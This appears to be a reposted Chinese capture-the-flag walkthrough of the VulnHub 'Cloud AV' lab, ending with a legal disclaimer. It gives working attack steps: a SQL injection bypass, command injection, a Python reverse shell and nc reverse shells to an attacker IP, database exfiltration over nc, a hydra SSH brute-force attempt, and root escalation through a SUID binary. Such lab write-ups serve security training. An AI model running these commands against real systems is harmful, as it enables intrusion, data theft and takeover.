0x01 下载地址

https://www.vulnhub.com/entry/boredhackerblog-cloud-av,453/

0x02 靶机目标

获取靶机root权限

0x03 工具准备

无

0x04 详细步骤

一、主机发现

for i in $(seq 1 254); do sudo arping -c 2 10.0.0.$i; done
sudo nmap -p- 10.0.0.20
sudo nmap -p22,8080 -sV 10.0.0.20

二、Web信息收集

攻击思路：1、SQL注入；2、暴力破解（密码为password）

1. 启动Burp抓包

2. 启动浏览器-设置代理-打开 http://10.0.0.20:8080

Tip：建议使用Burp Intruder在输入框测试所有可以键盘输入的字符，检测系统返回情况。

3. 通过观察测试得知输入"可使程序报错，且爆出如下内容

'select * from code where password="' + password + '"'

select * from code where password=" + password + "

select * from code where password="; + password + ";

三、SQL注入

构造攻击代码

select * from code where password="; + " or 1=1-- + ";

" or 1=1--

四、命令注入（nc串联）

1. 测试是否存在注入漏洞

hello | id

2. 反弹Shell

方法一：使用Python反弹Webshell

import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.0.0.14",5555));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);

方法二：如果受害主机存在nc指令，可以使用nc反弹shell

hello | which nc

1. Kali主机启动监听5555端口

nc -nvlp 5555

2. 靶机

nc 10.0.0.14 5555 -e /bin/sh #有的Linux发行版有nc命令，但没有-e参数，可以使用如下方法
或者
nc 10.0.0.14 5555 | /bin/sh | nc 10.0.0.14 6666 #nc串联

监听5555端口终端输入命令，监听6666端口的终端回显命令

五、系统信息收集（nc传输文件）

id
ls

cat app.py
file database.sql

• 经分析database.sql是sqlit数据库文件，是Web应用的数据库文件

• 通过NC传输database.sql文件到kali主机，再查看数据内容

• 启动kali主机nc监听

nc -lnvp 7777 > db.sql

• nc 5555终端

nc 10.0.0.14 7777 < database.sql

稍等一会后，使用Ctrl+C结束监听7777端口的终端

ls 查看db.sql已经在Kali主机上了

• 用sqlite数据库打开db.sql文件，获取密码

sqlite3
.open db.sql
.database
.dump

明文密码：

myinvitecode123
mysecondinvitecode
cloudavtech
mostsecurescanner

• 查看系统拥有Shell权限的用户

cat /etc/passwd | grep /bin/bash

系统用户名名单：

root
cloudav
scanner

六、SSH密码爆破（尝试失败）

vi user.txt
vi passwd.txt
hydra -L user.txt -P passwd.txt ssh://10.0.0.20

七、再次系统信息收集（发现具有sid权限的文件）

ls -l /home/scanner

分析上图得知：update_cloudav.c可能为update_cloudav的源码，且update_cloudav具有sid权限，且属主为root

八、代码审计

通过对update_cloudav.c的源码进行审计，发现运行update_cloudav在运行云查杀的时候一定要带参数。由此可以设想携带我们需要命令来实现root身份反弹shell。

九、NC串联、本地提权

• kali主机监听7777、8888

nc -lnvp 7777
nc -lnvp 8888

• 反弹Shell

./update_cloudav "a|nc 10.0.0.14 7777 | /bin/sh | nc 10.0.0.14 8888"

补充：Burp-Intruder暴力破解登录密码（略）

Kali自带的密码字典在/usr/share/wordlists

本文版权归作者和微信公众号平台共有，重在学习交流，不以任何盈利为目的，欢迎转载。

由于传播、利用此文所提供的信息而造成的任何直接或者间接的后果及损失，均由使用者本人负责，文章作者不为此承担任何责任。公众号内容中部分攻防技巧等只允许在目标授权的情况下进行使用，大部分文章来自各大安全社区，个人博客，如有侵权请立即联系公众号进行删除。若不同意以上警告信息请立即退出浏览！！！

敲敲小黑板：《刑法》第二百八十五条　【非法侵入计算机信息系统罪；非法获取计算机信息系统数据、非法控制计算机信息系统罪】违反国家规定，侵入国家事务、国防建设、尖端科学技术领域的计算机信息系统的，处三年以下有期徒刑或者拘役。违反国家规定，侵入前款规定以外的计算机信息系统或者采用其他技术手段，获取该计算机信息系统中存储、处理或者传输的数据，或者对该计算机信息系统实施非法控制，情节严重的，处三年以下有期徒刑或者拘役，并处或者单处罚金；情节特别严重的，处三年以上七年以下有期徒刑，并处罚金。

原文始发于微信公众号（巢安实验室）：CLOUD AV